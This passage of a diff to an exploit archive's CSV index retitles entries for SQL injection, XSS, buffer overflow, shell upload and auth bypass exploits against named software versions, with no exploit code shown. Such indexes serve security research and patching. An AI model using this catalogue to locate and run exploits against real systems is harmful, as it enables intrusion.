Overflow",2008-02-25,dummy,linux,local,0 +10313,platforms/linux/local/10313.c,"libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme - XSS / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 @@ -9614,10 +9614,10 @@ id,file,description,date,author,platform,type,port 10330,platforms/php/webapps/10330.txt,"elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Transversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 -10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 +10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 - smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 - RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 -10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS",2009-12-07,mr_me,php,webapps,0 +10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter - Persistant XSS",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0Day)",2009-12-07,"Jeremy Brown",linux,dos,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0Day)",2009-12-07,"Jeremy Brown",windows,local,0 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 @@ -9626,25 +9626,25 @@ id,file,description,date,author,platform,type,port 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 -10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620",2009-12-07,Global-Evolution,hardware,webapps,0 +10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Exploit",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - off-by-one Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI / RFI / XSS",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation - (.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 -10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS",2009-12-08,mr_me,php,webapps,0 +10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistant XSS",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Auth Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 -10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 +10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - .pls Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple XSS and Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0 -10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit (Metasploit)",2009-12-09,dookie,windows,remote,0 +10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow Exploit (Metasploit)",2009-12-09,dookie,windows,remote,0 10366,platforms/php/webapps/10366.txt,"Joomla Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0 10367,platforms/php/webapps/10367.txt,"Joomla Component com_jphoto SQL Injection - (id)",2009-12-10,kaMtiEz,php,webapps,0 -10368,platforms/asp/webapps/10368.txt,"Free ASP Upload Shell Upload",2009-12-10,Mr.aFiR,asp,webapps,0 +10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Shell Upload",2009-12-10,Mr.aFiR,asp,webapps,0 10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0 10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Auth Bypass SQL Injection",2009-12-10,mr_me,php,webapps,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (1)",2009-12-10,germaya_x,windows,local,0 @@ -9661,14 +9661,14 @@ id,file,description,date,author,platform,type,port 10384,platforms/php/webapps/10384.txt,"E-Store - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple XSS",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 10388,platforms/php/webapps/10388.txt,"Chipmunk Newsletter - CSRF",2009-12-11,"Milos Zivanovic ",php,webapps,0 -10389,platforms/php/webapps/10389.txt,"Illogator Shop SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 +10389,platforms/php/webapps/10389.txt,"Illogator Shop - SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c - Multiple SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 -10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 +10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 -10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 +10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs Memory Corruption PoC",2009-12-12,"Jeremy Brown",linux,local,0 10398,platforms/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website (XSS / Auth Bypass)",2009-12-12,bi0,php,webapps,0 10400,platforms/php/webapps/10400.txt,"Acc Auto Dealer Script 5.0 - Persistent XSS / SQL Backup",2009-12-13,bi0,php,webapps,0 @@ -9692,7 +9692,7 @@ id,file,description,date,author,platform,type,port 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Auth Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 10426,platforms/linux/webapps/10426.txt,"[WS] upload - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10427,platforms/linux/webapps/10427.txt,"DigitalHive - Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 -10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader Remote File Upload",2009-12-14,"ViRuSMaN ",windows,webapps,80 +10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Remote File Upload",2009-12-14,"ViRuSMaN ",windows,webapps,80 10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 / 1.5 - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,multiple,webapps,80 @@ -9700,7 +9700,7 @@ id,file,description,date,author,platform,type,port 10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - CSRF (Change Admin Password)",2009-12-14,"Milos Zivanovic ",linux,webapps,80 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (3)",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold CSRF - Create Administrator Account",2009-12-14,bi0,php,webapps,0 -10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10438,platforms/php/webapps/10438.txt,"AdManagerPro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 10439,platforms/php/webapps/10439.txt,"Ez Poll Hoster - Multiple XSS / CSRF Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10440,platforms/php/webapps/10440.txt,"Easy Banner Pro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 @@ -9712,8 +9712,8 @@ id,file,description,date,author,platform,type,port 10448,platforms/multiple/webapps/10448.txt,"Oracle e-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 10449,platforms/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection",2009-12-15,Securitylab.ir,asp,webapps,0 10450,platforms/php/webapps/10450.txt,"Linkster PHP/MySQL SQL Injection",2009-12-15,"Angela Zhang",php,webapps,0 -10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta ",hardware,remote,0 -10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro CSRF Change Admin Password",2009-12-15,"Milos Zivanovic ",php,webapps,0 +10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta ",hardware,remote,0 +10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro - CSRF Change Admin Password",2009-12-15,"Milos Zivanovic ",php,webapps,0 10453,platforms/php/webapps/10453.txt,"SitioOnline - SQL Injection",2009-12-15,4lG3r14n0-t3r0,php,webapps,0 10454,platforms/php/webapps/10454.txt,"Ez Faq Maker - Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - (PageId) SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 @@ -9729,7 +9729,7 @@ id,file,description,date,author,platform,type,port 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service",2009-12-16,"Patroklos Argyroudis",linux,dos,80 10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Auth Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - (Shell Upload/CSRF/XSS) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 -10473,platforms/asp/webapps/10473.txt,"V-SpacePal SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10475,platforms/windows/local/10475.txt,"QuickHeal antivirus 2010 - Local Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -9737,7 +9737,7 @@ id,file,description,date,author,platform,type,port 10479,platforms/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection",2009-12-16,"Nahuel Grisolia",php,webapps,0 10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 -10482,platforms/asp/webapps/10482.txt,"Codefixer Membership Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 +10482,platforms/asp/webapps/10482.txt,"Codefixer Membership - Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Local Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module - XSS",2009-12-16,"Justin C. Klein Keane",php,webapps,0 @@ -9758,14 +9758,14 @@ id,file,description,date,author,platform,type,port 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest - (edit.asp ID) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - (campaignEdit.asp CCam) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 +10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 - Upload Shell Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' XSS",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog - (dblog.mdb) Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 -10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,RENO,php,webapps,0 +10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin Exploit",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - CSRF",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 @@ -9774,19 +9774,19 @@ id,file,description,date,author,platform,type,port 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10527,platforms/php/webapps/10527.txt,"ReVou Software SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 +10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart - 'product_id' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 -10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a Cross-Site scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 +10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress Pyrmont 2.x Plugin - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10544,platforms/multiple/local/10544.html,"Mozilla Firefox Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 +10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 10545,platforms/php/webapps/10545.txt,"Joomla Component com_jbook - Blind SQL injection",2009-12-18,FL0RiX,php,webapps,0 10546,platforms/php/webapps/10546.txt,"Joomla Component com_digistore - SQL injection",2009-12-18,FL0RiX,php,webapps,0 10547,platforms/php/webapps/10547.txt,"Joomla Component com_acmisc - SQL injection",2009-12-18,FL0RiX,php,webapps,0 @@ -9795,7 +9795,7 @@ id,file,description,date,author,platform,type,port 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 -10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007",2009-12-19,Global-Evolution,php,webapps,0 +10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Exploit",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,"ViRuSMaN ",asp,webapps,0 @@ -9809,7 +9809,7 @@ id,file,description,date,author,platform,type,port 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0 -10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS",2009-12-20,K053,php,webapps,0 +10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller - XSS",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 @@ -9821,7 +9821,7 @@ id,file,description,date,author,platform,type,port 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 10583,platforms/php/webapps/10583.txt,"social Web CMS beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 -10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 +10584,platforms/php/webapps/10584.txt,"PHPhotoalbum - Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 @@ -9865,12 +9865,12 @@ id,file,description,date,author,platform,type,port 10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 10637,platforms/asp/webapps/10637.txt,"Web Wiz NewsPad - Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 10638,platforms/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 -10639,platforms/asp/webapps/10639.txt,"Snitz Forums 2000 Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 +10639,platforms/asp/webapps/10639.txt,"Snitz Forums 2000 - Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 10640,platforms/php/webapps/10640.txt,"Joomla Component com_schools - SQL Injection",2009-12-24,Mr.tro0oqy,php,webapps,0 10642,platforms/windows/local/10642.rb,"Exploit Easy RM to MP3 2.7.3.700 - Ruby",2009-12-24,"John Babio",windows,local,0 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 10646,platforms/windows/local/10646.c,"CastRipper - (.M3U) Stack BoF (Windows XP SP2)",2009-12-24,bibi-info,windows,local,0 -10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload",2009-12-24,RENO,php,webapps,0 +10647,platforms/php/webapps/10647.txt,"VideoIsland - Remote shell upload",2009-12-24,RENO,php,webapps,0 10648,platforms/php/webapps/10648.txt,"cms -db 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter - ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - (.asx) Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 @@ -9878,21 +9878,21 @@ id,file,description,date,author,platform,type,port 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps,0 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10655,platforms/php/webapps/10655.txt,"Best Top List Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 +10655,platforms/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10660,platforms/php/webapps/10660.txt,"barbo91 - uploads Upload Shell",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 -10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 -10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 - Remote File Upload",2009-12-26,"wlhaan hacker",php,webapps,0 10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 - Upload Shell",2009-12-26,indoushka,php,webapps,0 -10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 +10673,platforms/php/webapps/10673.txt,"DieselScripts jokes - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup",2009-12-26,indoushka,php,webapps,0 10675,platforms/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 @@ -9907,7 +9907,7 @@ id,file,description,date,author,platform,type,port 10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 -10688,platforms/php/webapps/10688.txt,"FlatPress Cross-Site 